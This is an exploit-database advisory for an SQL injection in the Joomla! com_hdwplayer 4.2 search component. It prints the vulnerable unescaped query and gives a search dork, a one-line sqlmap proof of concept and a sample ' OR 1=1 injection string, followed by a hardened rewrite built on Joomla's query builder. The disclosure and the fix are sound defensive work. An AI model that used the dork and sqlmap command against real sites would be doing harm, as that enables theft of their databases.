Vendor: Joomla! com_hdwplayer
By: qw3rTyTy
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Joomla! com_hdwplayer
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Debian/Nginx/Joomla! 3.9.11
2020

Joomla! com_hdwplayer 4.2 – ‘search.php’ SQL Injection

The 'search.php' model in Joomla! com_hdwplayer 4.2 is vulnerable to SQL injection. The 'hdwplayersearch' POST parameter is interpolated directly into the query string without escaping or parameterization, allowing an attacker to alter the query and potentially execute arbitrary SQL commands against the Joomla! database.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, consider using prepared statements or parameterized queries to prevent SQL injection attacks.

Exploit-DB raw data:

# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Dork: inurl:"index.php?option=com_hdwplayer"
# Date: 2020-03-23
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.hdwplayer.com/
# Software Link: https://www.hdwplayer.com/download/
# Version: 4.2
# Tested on: Debian/Nginx/Joomla! 3.9.11

##########################################################################
#Vulnerability details
##########################################################################
File: components/com_hdwplayer/models/search.php
Func: HdwplayerModelSearch::getsearch
Line: 33

    16  class HdwplayerModelSearch extends HdwplayerModel {
    ...snip...
    30      function getsearch() {
    31          $db = JFactory::getDBO();
    32          $search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');
    33          $query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')";    //!!! $search is interpolated unescaped
    34
    35          $db->setQuery($query);
    36          $output = $db->loadObjectList();
    37          return($output);
    38      }
    39
    40  }
    41
    42  ?>

##########################################################################
#PoC
##########################################################################
$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch
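As an added example that is not part of the advisory or of the HDW Player project, the following is how getsearch() could be rewritten with the Joomla! 3 database API so that the search term is escaped and quoted instead of being interpolated into the SQL string. It assumes the same table (#__hdwplayer_videos) and columns shown in the vulnerable snippet above; the 100-character cap on the search term is an assumption chosen for the example.

```php
<?php
// Added example: hardened HdwplayerModelSearch::getsearch() for Joomla! 3.
// Assumes the table #__hdwplayer_videos and the columns title, category, tags
// and published from the advisory's snippet; not the project's own code.
defined('_JEXEC') or die;

class HdwplayerModelSearch extends HdwplayerModel
{
    public function getsearch()
    {
        $db = JFactory::getDbo();

        // Read the POST parameter through the application input object
        // (JRequest is deprecated in Joomla! 3); getString() returns a plain string.
        $search = JFactory::getApplication()->input->post->getString('hdwplayersearch', '');

        // Assumed limit: bound the pattern length so a client cannot send an
        // arbitrarily long LIKE pattern.
        $search = substr(trim($search), 0, 100);

        // escape($search, true) escapes quotes and also the LIKE wildcards % and _,
        // so user input can only ever match literally. quote(..., false) then wraps
        // the result in quotes without escaping it a second time.
        $pattern = $db->quote('%' . $db->escape($search, true) . '%', false);

        // Build the statement with the query builder and quoted identifiers
        // instead of concatenating raw input into a string.
        $query = $db->getQuery(true)
            ->select('*')
            ->from($db->quoteName('#__hdwplayer_videos'))
            ->where($db->quoteName('published') . ' = 1')
            ->where('(' . $db->quoteName('title') . ' LIKE ' . $pattern
                . ' OR ' . $db->quoteName('category') . ' LIKE ' . $pattern
                . ' OR ' . $db->quoteName('tags') . ' LIKE ' . $pattern . ')');

        $db->setQuery($query);

        return $db->loadObjectList();
    }
}
```

With this version a submitted value such as `' OR 1=1 -- ` reaches MySQL only as an escaped literal inside the LIKE pattern, so the sqlmap run shown in the PoC no longer finds an injectable parameter.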